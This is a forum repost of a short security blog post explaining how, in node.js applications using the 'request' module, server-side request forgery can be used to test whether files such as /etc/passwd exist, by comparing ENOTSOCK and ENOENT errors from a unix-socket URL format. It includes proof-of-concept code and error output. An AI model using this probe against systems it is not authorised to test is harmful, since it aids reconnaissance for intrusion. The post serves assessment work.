Jump to content
Nytro

Enumerating Files Using Server Side Request Forgery and the request Module

By Nytro, in Securitate web

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

Enumerating Files Using Server Side Request Forgery and the request Module

Written by Adam Baldwin with ♥ on 15 December 2017 in  2 min

If you ever find Server Side Request Forgery (SSRF) in a node.js based application and the app is using the request module you can use a special url format to detect the existence of files / directories.

While request does not support the file:// scheme it does supports a special url format to communicate with unix domain sockets and the errors returned from a file existing vs not existing are different.

The format looks like this. http://unix:SOCKET:PATH and for our purposes we can ignore PATH all together.

Let’s take this code for example. We’re assuming that as a user we can somehow control the url.

File exists condition: 

 
  1. const Request = require('request')
  2.  
  3. Request.get('[http://unix:/etc/passwd'](http://unix:/etc/passwd'), (err) => {
  4. console.log(err)
  5. })

As /etc/password exists request will try and use it as a unix socket, of course it is not a unix socket so it will give a connection failure error. 

 
  1. { Error: connect **ENOTSOCK** /etc/passwd
  2. at Object._errnoException (util.js:1024:11)
  3. at _exceptionWithHostPort (util.js:1046:20)
  4. at PipeConnectWrap.afterConnect [as oncomplete] (net.js:1182:14)
  5. code: 'ENOTSOCK',
  6. errno: 'ENOTSOCK',
  7. syscall: 'connect',
  8. address: '/etc/passwd' }

File does not exist condition:

Using the same code with a different file that does not exist. 

 
  1. const Request = require('request')
  2.  
  3. Request.get('[http://unix:/does/not/exist'](http://unix:/etc/passwd'), (err) => {
  4. console.log(err)
  5. })

The resulting error looks like this. 

 
  1. { Error: connect **ENOENT** /does/not/exist
  2. at Object._errnoException (util.js:1024:11)
  3. at _exceptionWithHostPort (util.js:1046:20)
  4. at PipeConnectWrap.afterConnect [as oncomplete] (net.js:1182:14)
  5. code: 'ENOENT',
  6. errno: 'ENOENT',
  7. syscall: 'connect',
  8. address: '/does/not/exist' }

The different is small: ENOTSOCK, vs ENOENT

While not that severe of an issue on its own it’s a trick that’s help me on past security assessments to enumerate file path locations. Maybe you’ll find it useful too.

Originally posted on Medium

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...